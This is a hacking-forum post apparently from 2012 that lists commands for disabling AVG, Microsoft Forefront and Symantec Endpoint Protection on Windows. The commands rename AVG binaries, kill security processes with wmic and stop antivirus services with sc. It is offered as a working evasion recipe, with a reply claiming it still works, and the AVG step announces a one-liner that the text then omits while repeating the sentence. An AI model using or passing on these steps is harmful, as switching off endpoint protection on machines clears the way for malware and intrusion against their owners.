EvilZone
Hacking and Security => Hacking and Security => : z3ro August 06, 2012, 06:30:12 PM
-
1. AVG
Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.
Killing it: 1) Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.
C:\> cd %systemroot%\program files\avg\avg2012
C:\> move avgcsrva.exe avgcsrva_.exe
C:\> move avgemca.exe avgemca_.exe
C:\> move avgnsa.exe avgnsa_.exe
C:\> move avgrsa.exe avgrsa_.exe
2) Kill the running processes simultaneously with a one line (wildcard powered) wmic command.
Kill the running processes simultaneously with a one line (wildcard powered) wmic command.
>> The watchdog service will to restart all of the binaries but fail.
2. Microsoft Forefront
The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.
DISABLING: kill the GUI tool and stop the A/V engine service.
C:\> wmic process where name=”msseces.exe” delete
C:\> sc stop msmpsvc
3. Symantec Endpoint Protection
The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smb.exe, and smcgui.exe.
DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact.
C:\> wmic process where “name like ‘%smc%.exe’” delete
C:\> sc stop smcservice
C:\> sc stop “Symantec AntiVirus”
-
Please add some credits :)
-
Bit old but should still work.